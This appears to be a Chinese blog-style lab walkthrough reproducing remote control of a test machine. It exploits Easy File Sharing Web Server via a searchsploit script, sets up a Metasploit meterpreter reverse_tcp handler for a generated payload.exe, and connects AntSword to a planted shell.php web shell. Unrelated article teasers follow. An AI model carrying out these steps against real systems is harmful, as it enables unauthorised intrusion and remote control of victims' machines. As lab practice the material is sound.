一、漏洞测试
打开easy file sharing web server
进入后修改端口
点击go可以看到
之后打开kali用searchsploit easy file sharing扫描漏洞
利用对应的Python脚本攻击
攻击完成,说明无法阻挡本身漏洞
二、kali生成被控端和启动主控端
先ifconfig查询kali的ip地址然后生成payload
www.virustotal.com的检测结果
然后启动主控端
然后依次输入1.use exploit/multi/handler
2.set payload windows/meterpreter/reverse_tcp
3.set lhost 目标ip
4.set lport 5000
5.exploit
然后靶机打开payload.exe即可
三、蚁剑控制目标网站
打开phpstudy,启动apache和MySQL
然后生成shell.php
最后打开蚁剑,url地址填http://ip地址(一般为127.0.0.1)/shell.php,连接密码cmd即可
远程控制复现
张小明
前端开发工程师
耐用折叠屏手机推荐:三星Galaxy Z TriFold如何破解“折痕与耐用”难题?
当折叠屏手机从概念产品走向大众市场,消费者最关心的问题之一就是耐用性。毕竟,折叠屏设备多出了复杂的机械结构和柔性屏幕,这些部件在日常使用中面临更多挑战。那么,如今的折叠屏手机在耐用性方面达到了什么水平?三星…
前端技术风险防控:以防为主,防控结合
前端技术风险防控:以防为主,防控结合 1. 核心理念:防与控的辩证关系 防:在风险发生前,通过技术手段、流程规范、架构设计等主动预防,从根源上减少风险发生的概率。 控:当风险不可避免地发生时&a…
给女神发“在吗”,她回了个表情包是几个意思?—— 硬核探讨TCP 三次握手
兄弟们,最近看到个很有意思的段子。有个哥们给对象发:“我饿了。”对象回了个:“😂”。然后这哥们就炸了:“你什么意思?敷衍我?”其实,作为一个后端开发者,我必须得为这位…
入门大模型必知的100个基础问题(附简明答案)
写在前面 这篇内容将图片中的要点按顺序整理为「100 个基础问题 简明答案」。你可以把它当作查阅清单:从概念、结构、训练、评估到优化与应用,快速过一遍大模型(LLM)最常见的知识点。 100个基础问题什么是大模型? 答案…
vue基于Spring Boot的建筑材料管理系统的应用和研究_ug8y52z3
目录具体实现截图项目介绍论文大纲核心代码部分展示项目运行指导结论源码获取详细视频演示 :文章底部获取博主联系方式!同行可合作具体实现截图 本系统(程序源码数据库调试部署讲解)同时还支持java、ThinkPHP、Node.js、Spring B…
【大模型】-LangChain--RAG文档系统
文章目录1.完整代码2.结果展示3. RAG介绍1.完整代码 由于使用的是通义,所以代码改造了下,因为openAI需要钱 import streamlit as st import tempfile import osfrom langchain_classic.memory import ConversationBufferMemory from langchain_communi…